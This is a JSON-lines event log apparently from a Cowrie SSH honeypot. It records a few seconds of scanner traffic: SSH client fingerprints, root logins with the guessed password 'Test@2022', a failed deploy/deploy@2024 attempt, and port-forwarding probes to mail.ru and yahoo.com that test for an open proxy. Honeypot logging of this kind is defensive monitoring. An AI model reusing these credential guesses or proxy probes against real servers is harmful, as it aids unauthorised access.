{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:48.672741Z","src_ip":"77.83.207.83","session":"ec8c8974f607"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:48.921914Z","src_ip":"77.83.207.83","session":"ec8c8974f607"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":6801,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:6801","sensor":"my-vps","timestamp":"2025-08-31T03:47:48.973107Z","session":"ec8c8974f607"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:49.023475Z","src_ip":"77.83.207.83","session":"ec8c8974f607"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27554,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:27554","sensor":"my-vps","timestamp":"2025-08-31T03:47:49.165251Z","session":"ec8c8974f607"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:49.215625Z","src_ip":"77.83.207.83","session":"ec8c8974f607"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":26365,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c0aeee423d8","protocol":"ssh","message":"New connection: 212.227.235.229:26365 (1.2.3.4:22) [session: 2c0aeee423d8]","sensor":"my-vps","timestamp":"2025-08-31T03:47:49.333040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:49.334072Z","src_ip":"212.227.235.229","session":"2c0aeee423d8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":22520,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:22520","sensor":"my-vps","timestamp":"2025-08-31T03:47:49.356153Z","session":"ec8c8974f607"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:49.405918Z","src_ip":"77.83.207.83","session":"ec8c8974f607"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:49.456816Z","src_ip":"77.83.207.83","session":"ec8c8974f607"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":63593,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbc4f2188558","protocol":"ssh","message":"New connection: 77.83.207.83:63593 (1.2.3.4:22) [session: cbc4f2188558]","sensor":"my-vps","timestamp":"2025-08-31T03:47:49.506194Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:49.506943Z","src_ip":"77.83.207.83","session":"cbc4f2188558"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:49.557518Z","src_ip":"77.83.207.83","session":"cbc4f2188558"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:47:49.575178Z","src_ip":"212.227.235.229","session":"2c0aeee423d8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:49.809716Z","src_ip":"77.83.207.83","session":"cbc4f2188558"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":4131,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:4131","sensor":"my-vps","timestamp":"2025-08-31T03:47:49.861293Z","session":"cbc4f2188558"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:49.911959Z","src_ip":"77.83.207.83","session":"cbc4f2188558"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":57,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:57","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.056940Z","session":"cbc4f2188558"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.107260Z","src_ip":"77.83.207.83","session":"cbc4f2188558"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.213886Z","src_ip":"212.227.125.160","session":"3a579c9a3040"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":1212,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:1212","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.248894Z","session":"cbc4f2188558"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.299858Z","src_ip":"77.83.207.83","session":"cbc4f2188558"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.351177Z","src_ip":"77.83.207.83","session":"cbc4f2188558"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.352776Z","src_ip":"212.227.125.160","session":"3a579c9a3040"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":63668,"dst_ip":"1.2.3.4","dst_port":22,"session":"eaa173e51bcb","protocol":"ssh","message":"New connection: 77.83.207.83:63668 (1.2.3.4:22) [session: eaa173e51bcb]","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.401302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.401958Z","src_ip":"77.83.207.83","session":"eaa173e51bcb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.452383Z","src_ip":"77.83.207.83","session":"eaa173e51bcb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54842,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a34867f8226","protocol":"ssh","message":"New connection: 212.227.235.229:54842 (1.2.3.4:22) [session: 1a34867f8226]","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.462414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.463324Z","src_ip":"212.227.235.229","session":"1a34867f8226"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy@2024","message":"login attempt [deploy/deploy@2024] failed","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.581748Z","src_ip":"212.227.235.229","session":"2c0aeee423d8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.702120Z","src_ip":"77.83.207.83","session":"eaa173e51bcb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2967,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:2967","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.753407Z","session":"eaa173e51bcb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.803789Z","src_ip":"77.83.207.83","session":"eaa173e51bcb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":10744,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:10744","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.944546Z","session":"eaa173e51bcb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.994891Z","src_ip":"77.83.207.83","session":"eaa173e51bcb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:47:50.998279Z","src_ip":"212.227.235.229","session":"1a34867f8226"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":13849,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:13849","sensor":"my-vps","timestamp":"2025-08-31T03:47:51.136539Z","session":"eaa173e51bcb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:51.186900Z","src_ip":"77.83.207.83","session":"eaa173e51bcb"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:51.238291Z","src_ip":"77.83.207.83","session":"eaa173e51bcb"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":63762,"dst_ip":"1.2.3.4","dst_port":22,"session":"73a8821c7750","protocol":"ssh","message":"New connection: 77.83.207.83:63762 (1.2.3.4:22) [session: 73a8821c7750]","sensor":"my-vps","timestamp":"2025-08-31T03:47:51.287879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:51.288620Z","src_ip":"77.83.207.83","session":"73a8821c7750"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:51.338905Z","src_ip":"77.83.207.83","session":"73a8821c7750"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:51.589686Z","src_ip":"77.83.207.83","session":"73a8821c7750"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11318,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:11318","sensor":"my-vps","timestamp":"2025-08-31T03:47:51.640800Z","session":"73a8821c7750"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:51.691091Z","src_ip":"77.83.207.83","session":"73a8821c7750"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:51.821391Z","src_ip":"212.227.235.229","session":"2c0aeee423d8"}
